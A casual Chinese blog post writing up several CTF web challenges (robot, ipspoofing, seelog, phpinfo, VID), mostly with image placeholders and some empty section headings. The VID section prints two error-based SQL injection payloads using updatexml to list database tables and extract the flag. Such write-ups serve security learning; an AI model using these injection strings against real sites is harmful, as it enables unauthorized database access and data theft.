记ctf实战

最近本姑娘着迷ctf类竞赛,有志同道合的小伙伴可以留言一起来做点趣味题目呢

此网站第一道题目如下

一、robot

1,先进网站,发现了一张萌萌哒的图片,相信许多人和本姑娘一样,第一反应是load图片查看代码里面有没有猫腻,然而其实什么也木有呢。本姑娘就第一时间抓了包,用的burp你懂的。


记ctf实战_第1张图片

2,本姑娘在burp里面稍微找了一下,因是第一道题,着实没有什么难处,在spider发现了如下东西,就是本题解题思路啦

记ctf实战_第2张图片记ctf实战_第3张图片

3,直接输入找的线索,得到小旗旗


记ctf实战_第4张图片


二、ipspoofing

1,打开页面,发现是个页面,本姑娘按照一般思路看了下源代码没发现可疑之处,于是抓包。

记ctf实战_第5张图片

2,抓包后右键到spider想找找页面信息,不了突然跳出了如图所示的东西,甚为惊喜,上面给了登录网址,密码用户名,本姑娘快速访问链接


记ctf实战_第6张图片

3,后来再浏览文件时发现页面最下方有链接提示,直接可进入登录页面

记ctf实战_第7张图片

4,激动人心的最后一步,本姑娘输入了spider里面的用户名和密码登录不成功,立刻看源码,如图看到登录的username和password


记ctf实战_第8张图片


三、seelog

1,第三个题目有点意思,本姑娘回头想想答案全在题目里面

首先看着页面see blog 看到这里本姑娘一直在头脑风暴,势必记住看blog ,打开网址。


记ctf实战_第9张图片

2,网页是非请勿入,本姑娘,依然先看源代码,再抓包都没有什么重大发现

记ctf实战_第10张图片

3,纠结了半天,发现猫腻都在blog 里面,本姑娘在网页后面加了一个blog 出现了如图所示的东西



记ctf实战_第11张图片

4,打开第一个文件,查看blog 在这里科普两个小常识,

(1)一些常见的状态码为:

  • 200 – 服务器成功返回网页
  • 404 – 请求的网页不存在
  • 503 – 服务器超时
(2)Ctrl+F快捷键查看

终于找到了图示的链接


5,输入提示的链接成功拿到小旗旗

记ctf实战_第12张图片


四、phpinfo

记ctf实战_第13张图片



记ctf实战_第14张图片

记ctf实战_第15张图片

记ctf实战_第16张图片

五、VID

记ctf实战_第17张图片

记ctf实战_第18张图片

记ctf实战_第19张图片


记ctf实战_第20张图片


记ctf实战_第21张图片

记ctf实战_第22张图片



记ctf实战_第23张图片

记ctf实战_第24张图片

number=0&username=%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#&password=123&submit=Submit+Query  //爆表

number=0&username=%00' and updatexml(1,concat(1,substr((select * from flag),1,15)),1)#&password=123&submit=Submit+Query   //爆flag



六、GetFlag


七、天下武功唯快不破


八、pyscript



九、fuzzing



十、blog


你可能感兴趣的:(关于竞赛类)